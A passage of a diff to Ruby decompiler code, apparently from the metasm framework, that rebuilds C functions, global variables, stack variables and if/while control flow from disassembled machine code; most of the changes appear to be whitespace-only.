remove_unreferenced_vars(scope) + simplify_varname_noalias(scope) + rename_variables(scope) + end + @dasm.cpu.decompile_check_abi(self, entry, func) + + case ret = scope.statements.last + when C::CExpression; puts "no return at end of func" if $VERBOSE + when C::Return + if not ret.value + scope.statements.pop + else + v = ret.value + v = v.rexpr if v.kind_of? C::CExpression and not v.op and v.rexpr.kind_of? C::Typed + func.type.type = v.type + end + end + + if @recurse == 0 + # we need only the prototype + func.initializer = nil + end + end + + # redecompile a function, redecompiles functions calling it if its prototype changed + def redecompile(name) + @c_parser.toplevel.statements.delete_if { |st| st.kind_of? C::Declaration and st.var.name == name } + oldvar = @c_parser.toplevel.symbol.delete name + + decompile_func(name) + + if oldvar and newvar = @c_parser.toplevel.symbol[name] and oldvar.type.kind_of? C::Function and newvar.type.kind_of? C::Function + o, n = oldvar.type, newvar.type + if o.type != n.type or o.args.to_a.length != n.args.to_a.length or o.args.to_a.zip(n.args.to_a).find { |oa, na| oa.type != na.type } + # XXX a may depend on b and c, and b may depend on c -> redecompile c twice + # XXX if the dcmp is unstable, may also infinite loop on mutually recursive funcs.. + @c_parser.toplevel.statements.dup.each { |st| + next if not st.kind_of? C::Declaration + next if not st.var.initializer + next if st.var.name == name + next if not walk_ce(st) { |ce| break true if ce.op == :funcall and ce.lexpr.kind_of? C::Variable and ce.lexpr.name == name } + redecompile(st.var.name) + } + end + end + end + + def new_global_var(addr, type, scope=nil) + addr = @dasm.normalize(addr) + + # (almost) NULL ptr + return if addr.kind_of? Fixnum and addr >= 0 and addr < 32 + + # check preceding structure we're hitting + # TODO check what we step over when defining a new static struct + 0x100.times { |i_| + next if not n = @dasm.get_label_at(addr-i_) + next if not v = @c_parser.toplevel.symbol[n] + next if not v.type.pointer? or not v.type.pointed.untypedef.kind_of? C::Union + break if i_ == 0 # XXX it crashes later if we dont break here + next if sizeof(v.type.pointed) <= i_ + return structoffset(v.type.pointed.untypedef, C::CExpression[v], i_, nil) + } + + ptype = type.pointed.untypedef if type.pointer? + if ptype.kind_of? C::Function + name = @dasm.auto_label_at(addr, 'sub', 'xref', 'byte', 'word', 'dword', 'unk') + if @dasm.get_section_at(addr) and @recurse > 0 + puts "found function pointer to #{name}" if $VERBOSE + @dasm.disassemble(addr) if not @dasm.decoded[addr] # TODO disassemble_fast ? + f = @dasm.function[addr] ||= DecodedFunction.new + # TODO detect thunks (__noreturn) + f.decompdata ||= { :stackoff_type => {}, :stackoff_name => {} } + if not s = @c_parser.toplevel.symbol[name] or not s.initializer or not s.type.untypedef.kind_of? C::Function + os = @c_parser.toplevel.symbol.delete name + @c_parser.toplevel.statements.delete_if { |ts| ts.kind_of? C::Declaration and ts.var.name == name } + aoff = 1 + ptype.args.to_a.each { |a| + aoff = (aoff + @c_parser.typesize[:ptr] - 1) / @c_parser.typesize[:ptr] * @c_parser.typesize[:ptr] + f.decompdata[:stackoff_type][aoff] ||= a.type + f.decompdata[:stackoff_name][aoff] ||= a.name if a.name + aoff += sizeof(a) # ary ? + } + decompile_func_rec(addr) + s = @c_parser.toplevel.symbol[name] + walk_ce([@c_parser.toplevel, scope]) { |ce| + ce.lexpr = s if ce.lexpr == os + ce.rexpr = s if ce.rexpr == os + } if os and s # update existing references to old instance + # else redecompile with new prototye ? + end + end + end + + name = case (type.pointer? && tsz = sizeof(nil, ptype)) + when 1; 'byte' + when 2; 'word' + when 4; 'dword' + else 'unk' + end + name = 'stru' if ptype.kind_of? C::Union + name = @dasm.auto_label_at(addr, name, 'xref', 'byte', 'word', 'dword', 'unk', 'stru') + + if not var = @c_parser.toplevel.symbol[name] + var = C::Variable.new + var.name = name + var.type = type.pointer? ? C::Array.new(ptype) : type + @c_parser.toplevel.symbol[var.name] = var + @c_parser.toplevel.statements << C::Declaration.new(var) + end + if ptype.kind_of? C::Union and type.pointer? and s = @dasm.get_section_at(name) and s[0].ptr < s[0].length + # TODO struct init, array, fptrs.. + elsif type.pointer? and not type.pointed.untypedef.kind_of? C::Function and s = @dasm.get_section_at(name) and s[0].ptr < s[0].length and + [1, 2, 4].include? tsz and (not var.type.pointer? or sizeof(var.type.pointed) != sizeof(type.pointed) or not var.initializer) + # TODO do not overlap other statics (but labels may refer to elements of the array...) + data = (0..256).map { + v = s[0].decode_imm("u#{tsz*8}".to_sym, @dasm.cpu.endianness) + v = decompile_cexpr(v, @c_parser.toplevel) if v.kind_of? Expression # relocation + v + } + var.initializer = data.map { |v| C::CExpression[v, C::BaseType.new(:int)] } unless (data - [0]).empty? + if (tsz == 1 or tsz == 2) and eos = data.index(0) and (0..3).all? { |i| data[i] >= 0x20 and data[i] < 0x7f } # printable str + # XXX 0x80 with ruby1.9... + var.initializer = C::CExpression[data[0, eos].pack('C*'), C::Pointer.new(ptype)] rescue nil + end + if var.initializer.kind_of? ::Array and i = var.initializer.first and i.kind_of? C::CExpression and not i.op and i.rexpr.kind_of? C::Variable and + i.rexpr.type.kind_of? C::Function and not @dasm.get_section_at(@dasm.normalize(i.rexpr.name)) # iat_ExternalFunc + i.type = i.rexpr.type + type = var.type = C::Array.new(C::Pointer.new(i.type)) + var.initializer = [i] + end + var.initializer = nil if var.initializer.kind_of? ::Array and not type.untypedef.kind_of? C::Array + end + + # TODO patch existing references to addr ? (or would they have already triggered new_global_var?) + + # return the object to use to replace the raw addr + var + end + + # return an array of [address of block start, list of block to]] + # decompile subfunctions + def listblocks_func(entry) + @autofuncs ||= [] + blocks = [] + entry = dasm.normalize entry + todo = [entry] + while a = todo.pop + next if blocks.find { |aa, at| aa == a } + next if not di = @dasm.di_at(a) + blocks << [a, []] + di.block.each_to { |ta, type| + next if type == :indirect + ta = dasm.normalize ta + if type != :subfuncret and not @dasm.function[ta] and + (not @dasm.function[entry] or @autofuncs.include? entry) and + di.block.list.last.opcode.props[:saveip] + # possible noreturn function + # XXX call $+5; pop eax + @autofuncs << ta + @dasm.function[ta] = DecodedFunction.new + puts "autofunc #{Expression[ta]}" if $VERBOSE + end + + if @dasm.function[ta] and type != :subfuncret + f = dasm.auto_label_at(ta, 'func') + ta = dasm.normalize($1) if f =~ /^thunk_(.*)/ + ret = decompile_func_rec(ta) if (ta != entry or di.block.to_subfuncret) + throw :restart, :restart if ret == :restart + else + @dasm.auto_label_at(ta, 'label') if blocks.find { |aa, at| aa == ta } + blocks.last[1] |= [ta] + todo << ta + end + } + end + blocks + end + + # backtraces an expression from addr + # returns an integer, a label name, or an Expression + # XXX '(GetProcAddr("foo"))()' should not decompile to 'foo()' + def backtrace_target(expr, addr) + if n = @dasm.backtrace(expr, addr).first + return expr if n == Expression::Unknown + n = Expression[n].reduce_rec + n = @dasm.get_label_at(n) || n + n = $1 if n.kind_of? ::String and n =~ /^thunk_(.*)/ + n + else + expr + end + end + + # patches instruction's backtrace_binding to replace things referring to a static stack offset from func start by :frameptr+off + def makestackvars(funcstart, blocks) + blockstart = nil + cache_di = nil + cache = {} # [i_s, e, type] => backtrace + tovar = lambda { |di, e, i_s| + case e + when Expression; Expression[tovar[di, e.lexpr, i_s], e.op, tovar[di, e.rexpr, i_s]].reduce + when Indirection; Indirection[tovar[di, e.target, i_s], e.len, e.origin] + when :frameptr; e + when ::Symbol + cache.clear if cache_di != di ; cache_di = di + vals = cache[[e, i_s, 0]] ||= @dasm.backtrace(e, di.address, :snapshot_addr => blockstart, + :include_start => i_s, :no_check => true, :terminals => [:frameptr]) + # backtrace only to blockstart first + if vals.length == 1 and ee = vals.first and ee.kind_of? Expression and (ee == Expression[:frameptr] or + (ee.lexpr == :frameptr and ee.op == :+ and ee.rexpr.kind_of? ::Integer) or + (not ee.lexpr and ee.op == :+ and ee.rexpr.kind_of? Indirection and eep = ee.rexpr.pointer and + (eep == Expression[:frameptr] or (eep.lexpr == :frameptr and eep.op == :+ and eep.rexpr.kind_of? ::Integer)))) + ee + else + # fallback on full run (could restart from blockstart with ee, but may reevaluate addr_binding.. + vals = cache[[e, i_s, 1]] ||= @dasm.backtrace(e, di.address, :snapshot_addr => funcstart, + :include_start => i_s, :no_check => true, :terminals => [:frameptr]) + if vals.length == 1 and ee = vals.first and (ee.kind_of? Expression and (ee == Expression[:frameptr] or + (ee.lexpr == :frameptr and ee.op == :+ and ee.rexpr.kind_of? ::Integer))) ee - else e - end - end - else e - end - } - - # must not change bt_bindings until everything is backtracked - repl_bind = {} # di => bt_bd - - @dasm.cpu.decompile_makestackvars(@dasm, funcstart, blocks) { |block| - block.list.each { |di| - bd = di.backtrace_binding ||= @dasm.cpu.get_backtrace_binding(di) - newbd = repl_bind[di] = {} - bd.each { |k, v| - k = tovar[di, k, true] if k.kind_of? Indirection - next if k == Expression[:frameptr] or (k.kind_of? Expression and k.lexpr == :frameptr and k.op == :+ and k.rexpr.kind_of? ::Integer) - newbd[k] = tovar[di, v, false] - } - } - } - - repl_bind.each { |di, bd| di.backtrace_binding = bd } - end - - # give a name to a stackoffset (relative to start of func) - # 4 => :arg_0, -8 => :var_4 etc - def stackoff_to_varname(off) - if off >= @c_parser.typesize[:ptr]; 'arg_%X' % ( off-@c_parser.typesize[:ptr]) # 4 => arg_0, 8 => arg_4.. - elsif off > 0; 'arg_0%X' % off - elsif off == 0; 'retaddr' - elsif off <= -@dasm.cpu.size/8; 'var_%X' % (-off-@dasm.cpu.size/8) # -4 => var_0, -8 => var_4.. - else 'var_0%X' % -off - end - end - - # turns an Expression to a CExpression, create+declares needed variables in scope - def decompile_cexpr(e, scope, itype=nil) - case e - when Expression - if e.op == :'=' and e.lexpr.kind_of? ::String and e.lexpr =~ /^dummy_metasm_/ - decompile_cexpr(e.rexpr, scope, itype) - elsif e.op == :+ and e.rexpr.kind_of? ::Integer and e.rexpr < 0 - decompile_cexpr(Expression[e.lexpr, :-, -e.rexpr], scope, itype) - elsif e.lexpr - a = decompile_cexpr(e.lexpr, scope, itype) - C::CExpression[a, e.op, decompile_cexpr(e.rexpr, scope, itype)] - elsif e.op == :+ - decompile_cexpr(e.rexpr, scope, itype) - else - a = decompile_cexpr(e.rexpr, scope, itype) - C::CExpression[e.op, a] - end - when Indirection - case e.len - when 1, 2, 4, 8 - bt = C::BaseType.new("__int#{e.len*8}".to_sym) - else - bt = C::Struct.new - bt.members = [C::Variable.new('data', C::Array.new(C::BaseType.new(:__int8), e.len))] - end - itype = C::Pointer.new(bt) - p = decompile_cexpr(e.target, scope, itype) - p = C::CExpression[[p], itype] if not p.type.kind_of? C::Pointer - C::CExpression[:*, p] - when ::Integer - C::CExpression[e] - when C::CExpression - e - else - name = e.to_s - if not s = scope.symbol_ancestors[name] - s = C::Variable.new - s.type = C::BaseType.new(:__int32) - case e - when ::String # edata relocation (rel.length = size of pointer) - return @c_parser.toplevel.symbol[e] || new_global_var(e, itype || C::BaseType.new(:int), scope) - when ::Symbol; s.storage = :register ; s.add_attribute("register(#{name})") - else s.type.qualifier = [:volatile] - puts "decompile_cexpr unhandled #{e.inspect}, using #{e.to_s.inspect}" if $VERBOSE - end - s.name = name - scope.symbol[s.name] = s - scope.statements << C::Declaration.new(s) - end - s - end - end - - # simplify goto -> goto / goto -> return - def simplify_goto(scope, keepret = false) - if not keepret and scope.statements[-1].kind_of? C::Return and not scope.statements[-2].kind_of? C::Label - scope.statements.insert(-2, C::Label.new("ret_label")) - end - - jumpto = {} - walk(scope) { |s| - next if not s.kind_of? C::Block - s.statements.each_with_index { |ss, i| - case ss - when C::Goto, C::Return - while l = s.statements[i -= 1] and l.kind_of? C::Label - jumpto[l.name] = ss - end - end - } - } - - simpler = lambda { |s| - case s - when C::Goto - if jumpto[s.target] - r = jumpto[s.target].dup - r.value = r.value.deep_dup if r.kind_of? C::Return and r.value.kind_of? C::CExpression - r - end - when C::Return - if not keepret and scope.statements[-1].kind_of? C::Return and s.value == scope.statements[-1].value and s != scope.statements[-1] - C::Goto.new(scope.statements[-2].name) - end - end - } - - walk(scope) { |s| - case s - when C::Block - s.statements.each_with_index { |ss, i| - if sp = simpler[ss] - ss = s.statements[i] = sp - end - } - when C::If - if sp = simpler[s.bthen] - s.bthen = sp - end - end - } - - # remove unreferenced labels - remove_labels(scope) - - walk(scope) { |s| - next if not s.kind_of? C::Block - del = false - # remove dead code goto a; goto b; if (0) { z: bla; } => rm goto b - s.statements.delete_if { |st| - case st - when C::Goto, C::Return - olddel = del - del = true - olddel - else - del = false - end - } - # if () { goto x; } x: - s.statements.each_with_index { |ss, i| - if ss.kind_of? C::If - t = ss.bthen - t = t.statements.first if t.kind_of? C::Block - if t.kind_of? C::Goto and s.statements[i+1].kind_of? C::Label and s.statements[i+1].name == t.target - ss.bthen = C::Block.new(scope) - end - end - } - } - - remove_labels(scope) - end - - # changes ifgoto, goto to while/ifelse.. - def decompile_controlseq(scope) - # TODO replace all this crap by a method using the graph representation - scope.statements = decompile_cseq_if(scope.statements, scope) - remove_labels(scope) - scope.statements = decompile_cseq_if(scope.statements, scope) - remove_labels(scope) - # TODO harmonize _if/_while api (if returns a replacement, while patches) - decompile_cseq_while(scope.statements, scope) - decompile_cseq_switch(scope) - end - - # optimize if() { a; } to if() a; - def optimize_ctrl(scope) - simplify_goto(scope, true) - - # break/continue - # XXX if (foo) while (bar) goto bla; bla: should => break - walk = lambda { |e, brk, cnt| - case e - when C::Block - walk[e.statements, brk, cnt] - e - when ::Array - e.each_with_index { |st, i| - case st - when C::While, C::DoWhile - l1 = (e[i+1].name if e[i+1].kind_of? C::Label) - l2 = (e[i-1].name if e[i-1].kind_of? C::Label) - e[i].body = walk[st.body, l1, l2] - else - e[i] = walk[st, brk, cnt] - end - } - e - when C::If - e.bthen = walk[e.bthen, brk, cnt] if e.bthen - e.belse = walk[e.belse, brk, cnt] if e.belse - e - when C::While, C::DoWhile - e.body = walk[e.body, nil, nil] - e - when C::Goto - if e.target == brk - C::Break.new - elsif e.target == cnt - C::Continue.new - else e - end - else e - end - } - walk[scope, nil, nil] - - remove_labels(scope) - - # while (1) { a; if(b) { c; return; }; d; } => while (1) { a; if (b) break; d; } c; - while st = scope.statements.last and st.kind_of? C::While and st.test.kind_of? C::CExpression and - not st.test.op and st.test.rexpr == 1 and st.body.kind_of? C::Block - break if not i = st.body.statements.find { |ist| - ist.kind_of? C::If and not ist.belse and ist.bthen.kind_of? C::Block and ist.bthen.statements.last.kind_of? C::Return - } - walk(i.bthen.statements) { |sst| sst.outer = i.bthen.outer if sst.kind_of? C::Block and sst.outer == i.bthen } - scope.statements.concat i.bthen.statements - i.bthen = C::Break.new - end - - patch_test = lambda { |ce| - ce = ce.rexpr if ce.kind_of? C::CExpression and ce.op == :'!' - # if (a+1) => if (a != -1) - if ce.kind_of? C::CExpression and (ce.op == :+ or ce.op == :-) and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and ce.lexpr - ce.rexpr.rexpr = -ce.rexpr.rexpr if ce.op == :+ - ce.op = :'!=' - end - } - - walk(scope) { |ce| - case ce - when C::If - patch_test[ce.test] - if ce.bthen.kind_of? C::Block + else e + end + end + else e + end + } + + # must not change bt_bindings until everything is backtracked + repl_bind = {} # di => bt_bd + + @dasm.cpu.decompile_makestackvars(@dasm, funcstart, blocks) { |block| + block.list.each { |di| + bd = di.backtrace_binding ||= @dasm.cpu.get_backtrace_binding(di) + newbd = repl_bind[di] = {} + bd.each { |k, v| + k = tovar[di, k, true] if k.kind_of? Indirection + next if k == Expression[:frameptr] or (k.kind_of? Expression and k.lexpr == :frameptr and k.op == :+ and k.rexpr.kind_of? ::Integer) + newbd[k] = tovar[di, v, false] + } + } + } + + repl_bind.each { |di, bd| di.backtrace_binding = bd } + end + + # give a name to a stackoffset (relative to start of func) + # 4 => :arg_0, -8 => :var_4 etc + def stackoff_to_varname(off) + if off >= @c_parser.typesize[:ptr]; 'arg_%X' % ( off-@c_parser.typesize[:ptr]) # 4 => arg_0, 8 => arg_4.. + elsif off > 0; 'arg_0%X' % off + elsif off == 0; 'retaddr' + elsif off <= -@dasm.cpu.size/8; 'var_%X' % (-off-@dasm.cpu.size/8) # -4 => var_0, -8 => var_4.. + else 'var_0%X' % -off + end + end + + # turns an Expression to a CExpression, create+declares needed variables in scope + def decompile_cexpr(e, scope, itype=nil) + case e + when Expression + if e.op == :'=' and e.lexpr.kind_of? ::String and e.lexpr =~ /^dummy_metasm_/ + decompile_cexpr(e.rexpr, scope, itype) + elsif e.op == :+ and e.rexpr.kind_of? ::Integer and e.rexpr < 0 + decompile_cexpr(Expression[e.lexpr, :-, -e.rexpr], scope, itype) + elsif e.lexpr + a = decompile_cexpr(e.lexpr, scope, itype) + C::CExpression[a, e.op, decompile_cexpr(e.rexpr, scope, itype)] + elsif e.op == :+ + decompile_cexpr(e.rexpr, scope, itype) + else + a = decompile_cexpr(e.rexpr, scope, itype) + C::CExpression[e.op, a] + end + when Indirection + case e.len + when 1, 2, 4, 8 + bt = C::BaseType.new("__int#{e.len*8}".to_sym) + else + bt = C::Struct.new + bt.members = [C::Variable.new('data', C::Array.new(C::BaseType.new(:__int8), e.len))] + end + itype = C::Pointer.new(bt) + p = decompile_cexpr(e.target, scope, itype) + p = C::CExpression[[p], itype] if not p.type.kind_of? C::Pointer + C::CExpression[:*, p] + when ::Integer + C::CExpression[e] + when C::CExpression + e + else + name = e.to_s + if not s = scope.symbol_ancestors[name] + s = C::Variable.new + s.type = C::BaseType.new(:__int32) + case e + when ::String # edata relocation (rel.length = size of pointer) + return @c_parser.toplevel.symbol[e] || new_global_var(e, itype || C::BaseType.new(:int), scope) + when ::Symbol; s.storage = :register ; s.add_attribute("register(#{name})") + else s.type.qualifier = [:volatile] + puts "decompile_cexpr unhandled #{e.inspect}, using #{e.to_s.inspect}" if $VERBOSE + end + s.name = name + scope.symbol[s.name] = s + scope.statements << C::Declaration.new(s) + end + s + end + end + + # simplify goto -> goto / goto -> return + def simplify_goto(scope, keepret = false) + if not keepret and scope.statements[-1].kind_of? C::Return and not scope.statements[-2].kind_of? C::Label + scope.statements.insert(-2, C::Label.new("ret_label")) + end + + jumpto = {} + walk(scope) { |s| + next if not s.kind_of? C::Block + s.statements.each_with_index { |ss, i| + case ss + when C::Goto, C::Return + while l = s.statements[i -= 1] and l.kind_of? C::Label + jumpto[l.name] = ss + end + end + } + } + + simpler = lambda { |s| + case s + when C::Goto + if jumpto[s.target] + r = jumpto[s.target].dup + r.value = r.value.deep_dup if r.kind_of? C::Return and r.value.kind_of? C::CExpression + r + end + when C::Return + if not keepret and scope.statements[-1].kind_of? C::Return and s.value == scope.statements[-1].value and s != scope.statements[-1] + C::Goto.new(scope.statements[-2].name) + end + end + } + + walk(scope) { |s| + case s + when C::Block + s.statements.each_with_index { |ss, i| + if sp = simpler[ss] + ss = s.statements[i] = sp + end + } + when C::If + if sp = simpler[s.bthen] + s.bthen = sp + end + end + } + + # remove unreferenced labels + remove_labels(scope) + + walk(scope) { |s| + next if not s.kind_of? C::Block + del = false + # remove dead code goto a; goto b; if (0) { z: bla; } => rm goto b + s.statements.delete_if { |st| + case st + when C::Goto, C::Return + olddel = del + del = true + olddel + else + del = false + end + } + # if () { goto x; } x: + s.statements.each_with_index { |ss, i| + if ss.kind_of? C::If + t = ss.bthen + t = t.statements.first if t.kind_of? C::Block + if t.kind_of? C::Goto and s.statements[i+1].kind_of? C::Label and s.statements[i+1].name == t.target + ss.bthen = C::Block.new(scope) + end + end + } + } + + remove_labels(scope) + end + + # changes ifgoto, goto to while/ifelse.. + def decompile_controlseq(scope) + # TODO replace all this crap by a method using the graph representation + scope.statements = decompile_cseq_if(scope.statements, scope) + remove_labels(scope) + scope.statements = decompile_cseq_if(scope.statements, scope) + remove_labels(scope) + # TODO harmonize _if/_while api (if returns a replacement, while patches) + decompile_cseq_while(scope.statements, scope) + decompile_cseq_switch(scope) + end + + # optimize if() { a; } to if() a; + def optimize_ctrl(scope) + simplify_goto(scope, true) + + # break/continue + # XXX if (foo) while (bar) goto bla; bla: should => break + walk = lambda { |e, brk, cnt| + case e + when C::Block + walk[e.statements, brk, cnt] + e + when ::Array + e.each_with_index { |st, i| + case st + when C::While, C::DoWhile + l1 = (e[i+1].name if e[i+1].kind_of? C::Label) + l2 = (e[i-1].name if e[i-1].kind_of? C::Label) + e[i].body = walk[st.body, l1, l2] + else + e[i] = walk[st, brk, cnt] + end + } + e + when C::If + e.bthen = walk[e.bthen, brk, cnt] if e.bthen + e.belse = walk[e.belse, brk, cnt] if e.belse + e + when C::While, C::DoWhile + e.body = walk[e.body, nil, nil] + e + when C::Goto + if e.target == brk + C::Break.new + elsif e.target == cnt + C::Continue.new + else e + end + else e + end + } + walk[scope, nil, nil] + + remove_labels(scope) + + # while (1) { a; if(b) { c; return; }; d; } => while (1) { a; if (b) break; d; } c; + while st = scope.statements.last and st.kind_of? C::While and st.test.kind_of? C::CExpression and + not st.test.op and st.test.rexpr == 1 and st.body.kind_of? C::Block + break if not i = st.body.statements.find { |ist| + ist.kind_of? C::If and not ist.belse and ist.bthen.kind_of? C::Block and ist.bthen.statements.last.kind_of? C::Return + } + walk(i.bthen.statements) { |sst| sst.outer = i.bthen.outer if sst.kind_of? C::Block and sst.outer == i.bthen } + scope.statements.concat i.bthen.statements + i.bthen = C::Break.new + end + + patch_test = lambda { |ce| + ce = ce.rexpr if ce.kind_of? C::CExpression and ce.op == :'!' + # if (a+1) => if (a != -1) + if ce.kind_of? C::CExpression and (ce.op == :+ or ce.op == :-) and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and ce.lexpr + ce.rexpr.rexpr = -ce.rexpr.rexpr if ce.op == :+ + ce.op = :'!=' + end + } + + walk(scope) { |ce| + case ce + when C::If + patch_test[ce.test] + if ce.bthen.kind_of? C::Block case ce.bthen.statements.length - when 1 - walk(ce.bthen.statements) { |sst| sst.outer = ce.bthen.outer if sst.kind_of? C::Block and sst.outer == ce.bthen } - ce.bthen = ce.bthen.statements.first - when 0 + when 1 + walk(ce.bthen.statements) { |sst| sst.outer = ce.bthen.outer if sst.kind_of? C::Block and sst.outer == ce.bthen } + ce.bthen = ce.bthen.statements.first + when 0 if not ce.belse and i = ce.bthen.outer.statements.index(ce) - ce.bthen.outer.statements[i] = ce.test # TODO remove sideeffectless parts - end - end - end - if ce.belse.kind_of? C::Block and ce.belse.statements.length == 1 - walk(ce.belse.statements) { |sst| sst.outer = ce.belse.outer if sst.kind_of? C::Block and sst.outer == ce.belse } - ce.belse = ce.belse.statements.first - end - when C::While, C::DoWhile - patch_test[ce.test] - if ce.body.kind_of? C::Block - case ce.body.statements.length - when 1 - walk(ce.body.statements) { |sst| sst.outer = ce.body.outer if sst.kind_of? C::Block and sst.outer == ce.body } - ce.body = ce.body.statements.first - when 0 - if ce.kind_of? C::DoWhile and i = ce.body.outer.statements.index(ce) - ce = ce.body.outer.statements[i] = C::While.new(ce.test, ce.body) - end - ce.body = nil - end - end - end - } - walk(scope) { |ce| - next if not ce.kind_of? C::Block - st = ce.statements - st.length.times { |n| - while st[n].kind_of? C::If and st[n+1].kind_of? C::If and not st[n].belse and not st[n+1].belse and ( - (st[n].bthen.kind_of? C::Return and st[n+1].bthen.kind_of? C::Return and st[n].bthen.value == st[n+1].bthen.value) or - (st[n].bthen.kind_of? C::Break and st[n+1].bthen.kind_of? C::Break) or - (st[n].bthen.kind_of? C::Continue and st[n+1].bthen.kind_of? C::Continue)) - # if (a) return x; if (b) return x; => if (a || b) return x; - st[n].test = C::CExpression[st[n].test, :'||', st[n+1].test] - st.delete_at(n+1) - end - } - } - end - - # ifgoto => ifthen - # ary is an array of statements where we try to find if () {} [else {}] - # recurses to then/else content - def decompile_cseq_if(ary, scope) - return ary if forbid_decompile_ifwhile - # the array of decompiled statements to use as replacement - ret = [] - # list of labels appearing in ary - inner_labels = ary.grep(C::Label).map { |l| l.name } - while s = ary.shift - # recurse if it's not the first run - if s.kind_of? C::If - s.bthen.statements = decompile_cseq_if(s.bthen.statements, s.bthen) if s.bthen.kind_of? C::Block - s.belse.statements = decompile_cseq_if(s.belse.statements, s.belse) if s.belse.kind_of? C::Block - end - - # if (a) goto x; if (b) goto x; => if (a || b) goto x; - while s.kind_of? C::If and s.bthen.kind_of? C::Goto and not s.belse and ary.first.kind_of? C::If and ary.first.bthen.kind_of? C::Goto and - not ary.first.belse and s.bthen.target == ary.first.bthen.target - s.test = C::CExpression[s.test, :'||', ary.shift.test] - end - - # if (a) goto x; b; x: => if (!a) { b; } - if s.kind_of? C::If and s.bthen.kind_of? C::Goto and l = ary.grep(C::Label).find { |l_| l_.name == s.bthen.target } - # if {goto l;} a; l: => if (!) {a;} - s.test = C::CExpression.negate s.test - s.bthen = C::Block.new(scope) - s.bthen.statements = decompile_cseq_if(ary[0..ary.index(l)], s.bthen) - s.bthen.statements.pop # remove l: from bthen, it is in ary (was needed in bthen for inner ifs) - ary[0...ary.index(l)] = [] - end - - if s.kind_of? C::If and (s.bthen.kind_of? C::Block or s.bthen.kind_of? C::Goto) - s.bthen = C::Block.new(scope, [s.bthen]) if s.bthen.kind_of? C::Goto - - bts = s.bthen.statements - - # if (a) if (b) { c; } => if (a && b) { c; } - if bts.length == 1 and bts.first.kind_of? C::If and not bts.first.belse - s.test = C::CExpression[s.test, :'&&', bts.first.test] - bts = bts.first.bthen - bts = s.bthen.statements = bts.kind_of?(C::Block) ? bts.statements : [bts] - end - - # if (a) { if (b) goto c; d; } c: => if (a && !b) { d; } - if bts.first.kind_of? C::If and l = bts.first.bthen and (l = l.kind_of?(C::Block) ? l.statements.first : l) and l.kind_of? C::Goto and ary[0].kind_of? C::Label and l.target == ary[0].name - s.test = C::CExpression[s.test, :'&&', C::CExpression.negate(bts.first.test)] - if e = bts.shift.belse - bts.unshift e - end - end - - # if () { goto a; } a: - if bts.last.kind_of? C::Goto and ary[0].kind_of? C::Label and bts.last.target == ary[0].name - bts.pop - end - - # if { a; goto outer; } b; return; => if (!) { b; return; } a; goto outer; - if bts.last.kind_of? C::Goto and not inner_labels.include? bts.last.target and g = ary.find { |ss| ss.kind_of? C::Goto or ss.kind_of? C::Return } and g.kind_of? C::Return - s.test = C::CExpression.negate s.test - ary[0..ary.index(g)], bts[0..-1] = bts, ary[0..ary.index(g)] - end - - # if { a; goto l; } b; l: => if {a;} else {b;} - if bts.last.kind_of? C::Goto and l = ary.grep(C::Label).find { |l_| l_.name == bts.last.target } - s.belse = C::Block.new(scope) - s.belse.statements = decompile_cseq_if(ary[0...ary.index(l)], s.belse) - ary[0...ary.index(l)] = [] - bts.pop - end - - # if { a; l: b; goto any;} c; goto l; => if { a; } else { c; } b; goto any; - if not s.belse and (bts.last.kind_of? C::Goto or bts.last.kind_of? C::Return) and g = ary.grep(C::Goto).first and l = bts.grep(C::Label).find { |l_| l_.name == g.target } - s.belse = C::Block.new(scope) - s.belse.statements = decompile_cseq_if(ary[0...ary.index(g)], s.belse) - ary[0..ary.index(g)], bts[bts.index(l)..-1] = bts[bts.index(l)..-1], [] - end - - # if { a; b; c; } else { d; b; c; } => if {a;} else {d;} b; c; - if s.belse - bes = s.belse.statements - while not bts.empty? - if bts.last.kind_of? C::Label; ary.unshift bts.pop - elsif bes.last.kind_of? C::Label; ary.unshift bes.pop - elsif bts.last.to_s == bes.last.to_s; ary.unshift bes.pop ; bts.pop - else break - end - end - - # if () { a; } else { b; } => if () { a; } else b; - # if () { a; } else {} => if () { a; } - case bes.length - when 0; s.belse = nil - #when 1; s.belse = bes.first - end - end - - # if () {} else { a; } => if (!) { a; } - # if () { a; } => if () a; - case bts.length - when 0; s.test, s.bthen, s.belse = C::CExpression.negate(s.test), s.belse, nil if s.belse - #when 1; s.bthen = bts.first # later (allows simpler handling in _while) - end - end - - # l1: l2: if () goto l1; goto l2; => if(!) goto l2; goto l1; - if s.kind_of? C::If - ls = s.bthen - ls = ls.statements.last if ls.kind_of? C::Block - if ls.kind_of? C::Goto - if li = inner_labels.index(ls.target) - table = inner_labels - else - table = ary.map { |st| st.name if st.kind_of? C::Label }.compact.reverse - li = table.index(ls.target) || table.length - end - g = ary.find { |ss| - break if ss.kind_of? C::Return - next if not ss.kind_of? C::Goto - table.index(ss.target).to_i > li - } - if g - s.test = C::CExpression.negate s.test - if not s.bthen.kind_of? C::Block - ls = C::Block.new(scope) - ls.statements << s.bthen - s.bthen = ls - end - ary[0..ary.index(g)], s.bthen.statements = s.bthen.statements, decompile_cseq_if(ary[0..ary.index(g)], scope) - end - end - end - - ret << s - end - ret - end - - def decompile_cseq_while(ary, scope) - return if forbid_decompile_ifwhile - - # find the next instruction that is not a label - ni = lambda { |l| ary[ary.index(l)..-1].find { |s| not s.kind_of? C::Label } } - - # TODO XXX get rid of #index - finished = false ; while not finished ; finished = true # 1.9 does not support 'retry' - ary.each { |s| - case s - when C::Label - if ss = ni[s] and ss.kind_of? C::If and not ss.belse and ss.bthen.kind_of? C::Block - if ss.bthen.statements.last.kind_of? C::Goto and ss.bthen.statements.last.target == s.name - ss.bthen.statements.pop - if l = ary[ary.index(ss)+1] and l.kind_of? C::Label - ss.bthen.statements.grep(C::If).each { |i| - i.bthen = C::Break.new if i.bthen.kind_of? C::Goto and i.bthen.target == l.name - } - end - ary[ary.index(ss)] = C::While.new(ss.test, ss.bthen) - elsif ss.bthen.statements.last.kind_of? C::Return and g = ary[ary.index(s)+1..-1].reverse.find { |_s| _s.kind_of? C::Goto and _s.target == s.name } - wb = C::Block.new(scope) - wb.statements = decompile_cseq_while(ary[ary.index(ss)+1...ary.index(g)], wb) - w = C::While.new(C::CExpression.negate(ss.test), wb) - ary[ary.index(ss)..ary.index(g)] = [w, *ss.bthen.statements] - finished = false ; break #retry - end - end - if g = ary[ary.index(s)..-1].reverse.find { |_s| _s.kind_of? C::Goto and _s.target == s.name } - wb = 